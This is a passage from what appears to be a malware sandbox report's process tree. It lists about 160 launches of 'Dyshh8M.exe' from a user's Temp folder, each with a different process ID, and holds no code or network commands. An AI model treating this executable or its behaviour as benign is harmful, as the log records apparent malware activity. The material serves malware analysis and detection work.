      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8372
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8380
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8388
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8396
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8404
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8412
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8420
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8428
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8436
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8444
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8452
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8460
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8468
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8476
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8488
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8496
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8504
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8512
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8520
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8528
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8536
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8544
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8552
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8560
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8568
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8580
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8588
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8596
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8604
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8612
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8620
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8632
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8640
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8648
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8656
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8664
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8672
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8680
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8692
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8700
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8708
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8716
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8724
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8732
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8740
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8748
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8756
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8764
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8772
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8780
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8788
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8796
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8808
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8816
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8824
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8832
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8840
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8848
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8856
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8864
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8872
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8880
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8888
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8896
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8904
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8912
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8920
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8928
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8936
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8944
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8952
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8960
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8968
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8976
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8984
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8992
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9000
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9008
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9016
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9024
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9032
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9040
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9048
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9056
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9064
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9072
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9080
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9088
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9096
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9108
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9116
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9124
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9132
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9140
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9148
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9156
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9164
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9172
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9180
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9188
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9196
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9204
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8244
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8484
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8628
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:8804
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9212
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9228
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9236
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9244
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9252
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9260
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9268
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9276
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9284
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9292
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9300
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9308
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9316
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9324
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9332
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9340
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9348
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9356
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9364
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9372
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9380
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9388
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9396
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9404
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9412
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9420
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9428
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9436
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9444
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9452
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9460
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9468
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9480
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9488
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9496
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9504
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9512
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9520
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9528
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9536
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9544
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9552
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9560
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9568
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9576
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9584
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9592
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9600
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9608
      - C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10031860101\Dyshh8M.exe"
        6⤵
        
        PID:9616
